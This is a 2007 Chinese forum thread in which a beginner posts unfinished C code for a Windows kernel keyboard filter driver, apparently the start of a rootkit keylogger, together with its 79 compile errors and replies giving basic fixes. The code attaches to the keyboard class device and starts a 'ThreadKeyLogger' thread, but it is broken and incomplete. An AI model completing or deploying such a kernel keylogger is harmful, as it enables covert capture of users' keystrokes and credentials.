xiaoqilin
驱动牛犊
驱动牛犊
  • 注册日期2007-09-05
  • 最后登录2013-08-20
  • 粉丝1
  • 关注1
  • 积分38分
  • 威望204点
  • 贡献值0点
  • 好评度3点
  • 原创分0分
  • 专家分0分
阅读:6199回复:7

谁帮帮忙看看这个程序啊,编译的时候一堆莫名的错误

楼主#
更多 发布于:2007-09-23 21:36
那位大牛帮帮忙啊,刚开始学写一个键盘过滤驱动,没有写完呢,编译错误就一大堆了,谁帮忙解答一下阿。

#include "wdm.h"

typedef BOOLEAN BOOL;
typedef unsigned long DWORD;
typedef DWORD * PDWORD;
typedef unsigned long ULONG;
typedef unsigned short WORD;
typedef unsigned char BYTE;
typedef BYTE * LPBYTE;
typedef struct _DEVICE_EXTENSION
{
    PDEVICE_OBJECT pKeyboardDevice; //指向下一设备对象的指针
    PETHREAD pThreadObj;
    BOOL bThreadTerminate;
    HANDLE hLogFile;
    //KEY_STATE kState;
    KSEMAPHORE semQueue;
    KSPIN_LOCK lockQueue;
    LIST_ENTRY QueueListHead;

} DEVICE_EXTENSION, * PDEVICE_EXTENSION;
NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject,IN PUNICODE_STRING RegistryPath)
{
    NTSTATUS Status={0};
    //建立一个直通调度例程
    for( ULONG i =0 ;i < IRP_MJ_MAXIMUM_FUNCTION ; i++)
    
    pDriverObject->MajorFunction=DispatchPassDown;
    
    pDriverObject->MajorFunction[IRP_MJ_READ]=DispatchRead;
    HookKeyboard(pDriverObject); //插入驱动对象
    InitThreadKeyLogger(pDriverObject); //建立worker线程
    
}
NTSTATUS HookKeyboard(IN PDRIVER_OBJECT pDriverObject)
{
    PDEVICE_OBJECT pKeyboardDeviceObject;
    NTSTATUS status=IoCreateDevice(
        DriverObject,
        sizeof(DEVICE_EXTENSION),
        NULL,
        FILE_DEVICE_KEYBOARD,
        0,
        true,
        &pKeyboardDeviceObject
        )
        if(!NT_SUCCESS(status))
            return status;
        pKeyboardDeviceObject->Flags=pKeyboardDeviceObject->Flags |(DO_POWER_PAGABLE |DO_BUFFERED_IO);
        pKeyboardDeviceObject->Flags=pKeyboardDeviceObject->Flags &~DO_DEVICE_INITIALIZING ;
        
        RtlZeroMemory(pKeyboardDeviceObject->DeviceExtension,sizeof(DEVICE_EXTENSION));
        PDEVICE_EXTENSION pKeyboardDeviceExtension=(PDEVICE_EXTENSION)pKeyboardDeviceObject->DeviceExtension;
        
        CCHAR ntNameBuffer[64]="\\Device\\KeyboardClass0";
        STRING ntNameString;
        UNICODE_STRING uKeyboardDeviceName;
        RtlInitAnsiString(&ntNameString,ntNameBuffer);
        RtlAnsiStringToUnicodeString(&uKeyboardDeviceName,&ntNameString,TRUE);
        IoAttachDevice(pKeyboardDeviceObject,&uKeyboardDeviceName,&pKeyboardDeviceExtension->pKeyboardDevice);
        RtlFreeUnicodeString(&uKeyboardDeviceName);
        return STATUS_SUCCESS;
}

NTSTATUS InitThreadKeyLogger(IN PDRIVER_OBJECT pDriverObject)
{
        PDEVICE_EXTENSION pKeyboardDeviceExtension=(PDEVICE_EXTENSION)pKeyboardDeviceObject->DeviceExtension;    
        pKeyboardDeviceExtension->bThreadTerminate=false; //线程运行为false
        HANDLE hThread;
        NTSTATUS status=PsCreateSystemThread(&hThread,(ACCESS_MASK)0,NULL,(HANDLE)0,NULL,ThreadKeyLogger,pKeyboardDeviceExtension);
///////ThreadKeyLogger对象为线程处理函数,设备扩展中储存了线程对象的指针///////////
        if(!NT_SUCCESS(status))
            return status;

        ObReferenceObjectByHandle(hThread,THREAD_ALL_ACCESS,NULL,KernelMode,(PVOID*)&pKeyboardDeviceExtension->pThreadObj,NULL);
        ZwClose(hThread);
        return status;

}

附件名称/大小 下载次数 最后更新
kb.rar (29KB)  13 2007-09-23 21:36
qq_10652
驱动牛犊
驱动牛犊
  • 注册日期2004-11-11
  • 最后登录2008-07-04
  • 粉丝0
  • 关注0
  • 积分560分
  • 威望57点
  • 贡献值0点
  • 好评度57点
  • 原创分0分
  • 专家分0分
沙发#
发布于:2007-09-24 13:15
都有啥错误?把编译的输出结果贴上来看看
xiaoqilin
驱动牛犊
驱动牛犊
  • 注册日期2007-09-05
  • 最后登录2013-08-20
  • 粉丝1
  • 关注1
  • 积分38分
  • 威望204点
  • 贡献值0点
  • 好评度3点
  • 原创分0分
  • 专家分0分
板凳#
发布于:2007-09-24 17:13
Compiling - kbhook.c for i386
errors in directory f:\rootkit\kb
kbhook.c(27) : error C2143: syntax error : missing ';' before 'type'
kbhook.c(27) : error C2143: syntax error : missing ';' before 'type'
kbhook.c(27) : error C2143: syntax error : missing ')' before 'type'
kbhook.c(27) : error C2143: syntax error : missing ';' before 'type'
kbhook.c(27) : error C2065: 'i' : undeclared identifier
kbhook.c(27) : error C4552: '<' : operator has no effect; expected operator with side-effect
kbhook.c(27) : error C2059: syntax error : ')'
kbhook.c(29) : error C2146: syntax error : missing ';' before identifier 'pDriverObject'
kbhook.c(29) : error C2144: syntax error : '<Unknown>' should be preceded by '<Unknown>'
kbhook.c(29) : error C2144: syntax error : '<Unknown>' should be preceded by '<Unknown>'
kbhook.c(29) : error C2143: syntax error : missing ';' before 'identifier'
kbhook.c(29) : error C2065: 'DispatchPassDown' : undeclared identifier
kbhook.c(29) : error C4047: '=' : 'PDRIVER_DISPATCH' differs in levels of indirection from 'int'
kbhook.c(31) : error C2065: 'DispatchRead' : undeclared identifier
kbhook.c(31) : error C4047: '=' : 'PDRIVER_DISPATCH' differs in levels of indirection from 'int'
kbhook.c(32) : error C4013: 'HookKeyboard' undefined; assuming extern returning int
kbhook.c(33) : error C4013: 'InitThreadKeyLogger' undefined; assuming extern returning int
kbhook.c(37) : error C4142: benign redefinition of type
kbhook.c(40) : error C2065: 'DriverObject' : undeclared identifier
kbhook.c(40) : error C4047: 'function' : 'PDRIVER_OBJECT' differs in levels of indirection from 'int'
kbhook.c(45) : error C2065: 'true' : undeclared identifier
kbhook.c(45) : error C4242: 'function' : conversion from 'int' to 'BOOLEAN', possible loss of data
kbhook.c(48) : error C2143: syntax error : missing ';' before 'if'
kbhook.c(54) : error C2275: 'PDEVICE_EXTENSION' : illegal use of this type as an expression
kbhook.c(54) : error C2146: syntax error : missing ';' before identifier 'pKeyboardDeviceExtension'
kbhook.c(54) : error C2144: syntax error : '<Unknown>' should be preceded by '<Unknown>'
kbhook.c(54) : error C2144: syntax error : '<Unknown>' should be preceded by '<Unknown>'
kbhook.c(54) : error C2143: syntax error : missing ';' before 'identifier'
kbhook.c(54) : error C2065: 'pKeyboardDeviceExtension' : undeclared identifier
kbhook.c(54) : error C4047: '=' : 'int' differs in levels of indirection from 'PDEVICE_EXTENSION'
kbhook.c(56) : error C2275: 'CCHAR' : illegal use of this type as an expression
kbhook.c(56) : error C2146: syntax error : missing ';' before identifier 'ntNameBuffer'
kbhook.c(56) : error C2144: syntax error : '<Unknown>' should be preceded by '<Unknown>'
kbhook.c(56) : error C2144: syntax error : '<Unknown>' should be preceded by '<Unknown>'
kbhook.c(56) : error C2143: syntax error : missing ';' before 'identifier'
kbhook.c(56) : error C2065: 'ntNameBuffer' : undeclared identifier
kbhook.c(56) : error C2109: subscript requires array or pointer type
kbhook.c(57) : error C2275: 'STRING' : illegal use of this type as an expression
kbhook.c(57) : error C2146: syntax error : missing ';' before identifier 'ntNameString'
kbhook.c(57) : error C2144: syntax error : '<Unknown>' should be preceded by '<Unknown>'
kbhook.c(57) : error C2144: syntax error : '<Unknown>' should be preceded by '<Unknown>'
kbhook.c(57) : error C2143: syntax error : missing ';' before 'identifier'
kbhook.c(57) : error C2065: 'ntNameString' : undeclared identifier
kbhook.c(58) : error C2275: 'UNICODE_STRING' : illegal use of this type as an expression
kbhook.c(58) : error C2146: syntax error : missing ';' before identifier 'uKeyboardDeviceName'
kbhook.c(58) : error C2144: syntax error : '<Unknown>' should be preceded by '<Unknown>'
kbhook.c(58) : error C2144: syntax error : '<Unknown>' should be preceded by '<Unknown>'
kbhook.c(58) : error C2143: syntax error : missing ';' before 'identifier'
kbhook.c(58) : error C2065: 'uKeyboardDeviceName' : undeclared identifier
kbhook.c(59) : error C4133: 'function' : incompatible types - from 'int *' to 'PANSI_STRING'
kbhook.c(59) : error C4047: 'function' : 'PCSZ' differs in levels of indirection from 'int'
kbhook.c(60) : error C4133: 'function' : incompatible types - from 'int *' to 'PUNICODE_STRING'
kbhook.c(60) : error C4133: 'function' : incompatible types - from 'int *' to 'PCANSI_STRING'
kbhook.c(61) : error C4133: 'function' : incompatible types - from 'int *' to 'PUNICODE_STRING'
kbhook.c(61) : error C2223: left of '->pKeyboardDevice' must point to struct/union
kbhook.c(61) : error C2198: 'IoAttachDevice' : too few arguments for call through pointer-to-function
kbhook.c(62) : error C4133: 'function' : incompatible types - from 'int *' to 'PUNICODE_STRING'
kbhook.c(67) : error C4142: benign redefinition of type
kbhook.c(68) : error C2065: 'pKeyboardDeviceObject' : undeclared identifier
kbhook.c(68) : error C2223: left of '->DeviceExtension' must point to struct/union
kbhook.c(69) : error C2065: 'false' : undeclared identifier
kbhook.c(69) : error C4242: '=' : conversion from 'int' to 'BOOL', possible loss of data
kbhook.c(70) : error C2275: 'HANDLE' : illegal use of this type as an expression
kbhook.c(70) : error C2146: syntax error : missing ';' before identifier 'hThread'
kbhook.c(70) : error C2144: syntax error : '<Unknown>' should be preceded by '<Unknown>'
kbhook.c(70) : error C2144: syntax error : '<Unknown>' should be preceded by '<Unknown>'
kbhook.c(70) : error C2143: syntax error : missing ';' before 'identifier'
kbhook.c(70) : error C2065: 'hThread' : undeclared identifier
kbhook.c(71) : error C2275: 'NTSTATUS' : illegal use of this type as an expression
kbhook.c(71) : error C2146: syntax error : missing ';' before identifier 'status'
kbhook.c(71) : error C2144: syntax error : '<Unknown>' should be preceded by '<Unknown>'
kbhook.c(71) : error C2144: syntax error : '<Unknown>' should be preceded by '<Unknown>'
kbhook.c(71) : error C2143: syntax error : missing ';' before 'identifier'
kbhook.c(71) : error C2065: 'status' : undeclared identifier
kbhook.c(71) : error C4047: 'function' : 'PHANDLE' differs in levels of indirection from 'int *'
kbhook.c(71) : error C2065: 'ThreadKeyLogger' : undeclared identifier
kbhook.c(71) : error C4047: 'function' : 'PKSTART_ROUTINE' differs in levels of indirection from 'int'
kbhook.c(76) : error C4022: 'ObReferenceObjectByHandle' : pointer mismatch for actual parameter 1
kbhook.c(77) : error C4022: 'ZwClose' : pointer mismatch for actual parameter 1
BUILD: Compile errors: not linking f:\rootkit\kb directory
BUILD: Done

    2 files compiled - 79 Errors
zjan521
驱动牛犊
驱动牛犊
  • 注册日期2002-10-02
  • 最后登录2010-07-20
  • 粉丝0
  • 关注0
  • 积分3分
  • 威望91点
  • 贡献值0点
  • 好评度74点
  • 原创分0分
  • 专家分0分
地板#
发布于:2007-09-24 21:09
1. 请确定您的源代码完整。

 //kbhook.c(56) : error C2065: 'ntNameBuffer' : undeclared identifier
所有 C2065 错误, 都只能由您自己解决

2. 请您注意 C++ 和 C的区别. VS对于C的支持远没有C++那么好.

如果您不清楚这之间的差别, 那么很多时候, 你可以把 *.c 重命名为 *.cpp.
qq_10652
驱动牛犊
驱动牛犊
  • 注册日期2004-11-11
  • 最后登录2008-07-04
  • 粉丝0
  • 关注0
  • 积分560分
  • 威望57点
  • 贡献值0点
  • 好评度57点
  • 原创分0分
  • 专家分0分
地下室#
发布于:2007-09-25 11:20
把.c改成.cpp吧,很多变量都是C++语法说明的

剩下就是未定义的变量了,定义一下就行

很多编译错误都是常识性的,要是摆不平建议您先别做驱动
xiaoqilin
驱动牛犊
驱动牛犊
  • 注册日期2007-09-05
  • 最后登录2013-08-20
  • 粉丝1
  • 关注1
  • 积分38分
  • 威望204点
  • 贡献值0点
  • 好评度3点
  • 原创分0分
  • 专家分0分
5楼#
发布于:2007-09-25 17:45
我弄好了,谢谢大家了,学驱动刚刚开始不久,很多问题都不是很明白.
hnsyz
驱动牛犊
驱动牛犊
  • 注册日期2001-12-31
  • 最后登录2010-04-20
  • 粉丝1
  • 关注0
  • 积分108分
  • 威望259点
  • 贡献值0点
  • 好评度8点
  • 原创分0分
  • 专家分0分
6楼#
发布于:2007-12-23 22:45
回 楼主(xiaoqilin)的帖子
留个联系方式吧?有问题请教您一下?我这两天也在看过滤键盘的东西呢。
QQ:6020651
学习,交流
wuyanfeng
驱动小牛
驱动小牛
  • 注册日期2003-08-26
  • 最后登录2011-05-06
  • 粉丝0
  • 关注0
  • 积分1002分
  • 威望127点
  • 贡献值0点
  • 好评度103点
  • 原创分0分
  • 专家分0分
7楼#
发布于:2007-12-24 00:01
怎么驱动开发网都成了搞rootkit 的专业网站了.
游客

返回顶部